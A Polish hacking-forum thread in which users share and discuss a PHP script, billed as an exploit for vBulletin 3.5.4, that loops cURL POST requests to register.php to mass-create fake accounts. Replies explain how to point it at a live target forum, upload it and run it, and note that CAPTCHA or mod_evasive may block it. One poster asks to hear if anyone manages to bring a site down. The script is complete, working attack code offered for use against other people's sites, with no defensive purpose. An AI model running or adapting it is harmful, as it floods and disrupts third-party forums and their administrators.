Exploit vBulletin v.3,5,4

[David2003]

tak więc prosze o pomoc w skonfigurowaniu go.. ai jeszcze podstawowe pytanie-> czy on wogule bedzie dzialac :>

####################### vBulletin Version 3.5.4 #########################

Script : vBulletin Version 3.5.4

site : www.vbulletin.com

Exploit by : x-boy

E-mail : [EMAIL PROTECTED]

Type : Registration flood in register.php

Thanks to : Simo64

#########################################################################

Code of exploit (For english version , you can change it to other language)=>
exploit.php

cURL Must be activated (http://curl.haxx.se)

Sorry for my bad English

#########################################################################

<?

set_time_limit(60);

//You can change 10 to other numbers

for($i = 1 ; $i <= 10 ; $i++)

{

//to put curl to send POST request

$ch = curl_init();

//change http://localhost/vb3 to the url of the script

curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');

curl_setopt($ch , CURLOPT_POST , 1) ;

curl_setopt($ch , CURLOPT_POSTFIELDS ,
'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT
-12:00) Eniwetok, Kwajalein&dst=DST corrections always
on&options[showemail]=1');

curl_exec($ch);

curl_close($ch);

}

//Flood finished good luck

?>

##########################################################################[/b]

 

[bobikrk]

A dlaczego ma nie działać, jak tylko użyjesz go na wersji 3.5.4 to będzie działać.

Po drugie co tu konfigurować...

curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');

pogrubiony link zmieniasz na docelowy, zapisujesz to jako php, wgrywasz na serwer odpalasz i tyle.

 

[g3t0]

Originally posted by bobikrk
A dlaczego ma nie działać, jak tylko użyjesz go na wersji 3.5.4 to będzie działać.

Nie zupełnie masz racje,po pierwsze nie może być użyta CAPTCHA (z tego co bronią się developerzy projektu, to jest on dostępna, ale uwaga nie defaultowo !!!). Po drugie trzeba raczej liczyć na brak mod_evasive. Sam nie sprawdzałem więc na 100% nie wiem. Jak uda ci się coś 'położyć' to daj znać

 

[David2003]

$ch = curl_init();[/b]

jescze ostatnie pytania... o co b z tym curlem ?

//to put curl to send POST request[/b]

...i czy register po prostu jako odnosnik tego forum/strony :? :>
bo tak zrobilem wbilem to na servm odpalilem i .. nic ;|

 

[bobikrk]

Ehhh, ucz się dalej. :nauka: